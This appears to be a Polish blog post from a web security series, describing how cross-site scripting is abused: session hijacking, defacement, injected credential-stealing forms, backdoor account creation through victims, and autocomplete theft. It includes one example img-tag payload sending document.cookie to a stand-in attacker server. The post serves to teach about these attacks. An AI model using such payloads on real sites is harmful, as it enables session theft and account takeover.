Bezpieczeństw web: Jak XSS może być wykorzystany?

W poprzednich wpisach z tego cyklu, opisałem podstawowe typy XSS (Stored, Reflected, DOM-based).
Dzisiaj podam kilka przykładów pokazujących do czego XSS może być wykorzystany.

Przejęcie sesji
Jest to chyba jeden z najczęściej pokazywanych przykładów. Możemy wkleić np. obrazek lub link, zawierający link do naszego serwera. Jako parametr wywołania, za pomocą JavaScript możliwe jest odczytanie ciasteczek użytkownika, które z kolei zawierają identyfikator sesji. Przykład:

<img src=http://www.NaszSerwer.com/images/+document.cookie'/>

Oczywiście ma to wadę – musimy monitorować nasz serwer w celu sprawdzenia, czy ktoś aktualnie jest zalogowany. Identyfikator sesji wygasa, zatem atak ma swoje ograniczenia, jeśli nie jest poprawnie zautomatyzowany. W najprostszej formie polega na monitorowaniu własnego serwera i w przypadku uzyskania sesji, zalogowanie się do atakowanej strony za pomocą sesji. Dopóki sesja nie straci ważności (np. kiedy użytkownik wyloguje się), będziemy mieli nieograniczony dostęp. Z tego względu, użytkownicy zawsze powinni wylogowywać się, jeśli nie korzystają już z danej strony.

Website defacement
Kolejnym, często wykorzystywanym typem ataku, jest “Website defacement”, czyli wklejenie dowolnej treści jako zawartość strony. Najbardziej prymitywne sposoby, to po prostu zaśmiecenie strony reklamami czy treścią niepasującą do danej strony.
Bardziej wyrafinowane ataki, zmodyfikują treść w taki sposób, aby nie było to oczywiste dla każdej osoby. Na przykład, można zmodyfikować ceny usług, adres czy numery kontaktowe. Taki atak może nie być spostrzeżony zbyt szybko, a spowoduje utratę pewnych klientów (np. przez zbyt wysokie ceny lub złe dane adresowe\kontaktowe).

Wstrzykiwanie formularzy
Za pomocą JavaScript możemy zdziałać naprawdę bardzo dużo. Możemy również wstrzyknąć pełny formularz, który będzie wysyłać dane do naszego serwera. Skrajnym przypadkiem jest formularz do logowania. Można np. za pomocą JS wstrzyknąć formularz, który najpierw wysyła login i hasło do naszego serwera, a potem przekazuje je do oryginalnego, prawdziwego formularza. Dzięki temu, atak jest niewidzialny. Użytkownik faktycznie byłby zalogowany do prawdziwej strony, ale nie miałby pojęcia, że w w międzyczasie jego dane zostały wysyłane do zewnętrznego serwera. Atak stanowi wyrafinowaną formę phishing. Bardziej ostrożni użytkownicy, przed wpisaniem hasła sprawdzą certyfikat strony oraz link z którego korzystają. W tym problem, że w przypadku XSS korzystają oni z tej samej domeny, więc bardzo ciężko byłoby im spostrzec, że formularz został podmieniony.

Wykorzystywanie ofiary do przeprowadzenia kolejnych ataków
W pierwszym punkcie o wykradnięciu sesji, napisałem, że trzeba monitorować własny serwer, aby wiedzieć, kiedy dana sesja jest aktywna. Alternatywą jest, przeprowadzenie jakichkolwiek ataków za pomocą ofiary. Innymi słowy, zamiast wykradać jego sesję, lepiej spowodować, aby np. spróbował stworzyć nowe konto.

Jeśli dana osoba, ma uprawnienia administratora, wtedy zamiast wykradać jego sesje i tworzyć nowe konto dla nas, moglibyśmy w jego imieniu, stworzyć nowe konto. Analogicznie z innymi atakami, np. SQL Exception. Atak stanie się zatem zautomatyzowany – każdy użytkownik logujący się do systemu, będzie próbował stworzyć dla nas konto (backdoor). Po pewnym czasie, prawdopodobnie zaloguje się osoba z odpowiednimi pozwoleniami (administrator) i operacja zakończy się sukcesem.

Ponadto, wszelkie logi nie będą prowadzić do nas. Jeśli ktoś stworzy nowe konto dla nas, w logach systemowych będzie jego adres IP, a nie nasz.

Wykradnięcie danych z autocomplete
W JavaScript można odbierać zdarzenia AutoComplete. Jeśli zatem przeglądarka ma w cache nazwę użytkownika lub hasło, wtedy możliwe jest przesłanie danych do zewnętrznego serwera. Atak wygląda podobnie do wykradnięcia sesji. Po prostu zamiast odczytywania ciasteczek, podłączamy się pod autocomplete.

To tylko “klasyczne” przypadki. W Internecie znajduje się wiele innych przykładów, które były wykorzystane przeciwko Amazon czy MySpace. Część z nich w działaniu przypomina klasyczne wirusy, które potrafią się rozprzestrzeniać z jednej strony na drugą. Pamiętajmy jedno – każdy z opisanych dotychczas ataków (SQL injection, XSS) może być tak eskalowany, że spowoduje całkowite przejęcie kontroli nad daną infrastrukturą.

Leave a Reply

Your email address will not be published.